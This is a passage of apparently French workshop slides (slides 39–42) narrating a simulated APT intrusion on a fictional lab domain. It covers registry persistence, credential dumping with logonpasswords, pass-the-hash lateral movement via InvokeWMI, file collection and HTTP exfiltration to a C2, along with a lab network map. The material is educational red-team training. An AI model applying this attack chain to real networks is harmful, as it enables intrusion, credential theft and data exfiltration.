  • 39. Scenario #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT PERSISTENCE PHASE: - Registry method (application) - WMI method (juste un coup d’œil) 39 Techniques Résultats Après redémarrage, team APT98 conserve l’accès à la cli01, compte non privilégié Mot de passe en claire + HASH pour jmamu et cfotso CREDENTIAL ACCESS PHASE: - Logonpasswords Commandes
  • 40. Scenario #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT LATERAL MOVEMENT PHASE: - InvokeWMI (HASH: copier-coller cfotso , CIBLE: 192.168.10.22)  Nouvel agent: - Hostname - rename agent - Check admin state - Persistence: registry - Get_loggedon - logonpasswords 40 TechniquesCommandes Résultats Prise de contrôle de Nouveaux postes: cli02, dc01 Session locale PRIVILEGIEE Installation de la persistence sur cli02 et dc01 Obtention des mots de passe en clair + HASH du compte du DG: azoplaya Répétion sur dc01.emizoplaya.com
  • 41. Etat d’avancement #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT 41 Serveur - DC - Files Antoine ZOPLAYA (DG) Nom PC: cli02 IP: 192.168.10.22 Jessica MAMU (CP) Nom PC: cli01 IP: 192.168.10.21 C2 infra - APT98 autres APT98 Team (Internet) Céline FOTSO (Sysadmin) Nom PC: DC01 IP: 192.168.10.1 Domain: emizoplaya.com 192.168.10.203 192.168.43.203 Internet virtuel Wifi: Eolab 192.168.10.10 NAT
  • 42. Scenario #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT COLLECTION PHASE: Commande - Get-ChildItem Résultats Le dossier projet a été identifié comme dossier à forte valeur sensible. Ce dossier a été compressé et exfiltré vers le C2 COMPRESSION PHASE: Techniques - Zip Folder EXFILTTRATION PHASE: Techniques - File Upload via HTTP 1 Mois plus tard Antoine Zoplaya parti en congé, effectue son retour et réouvre sa session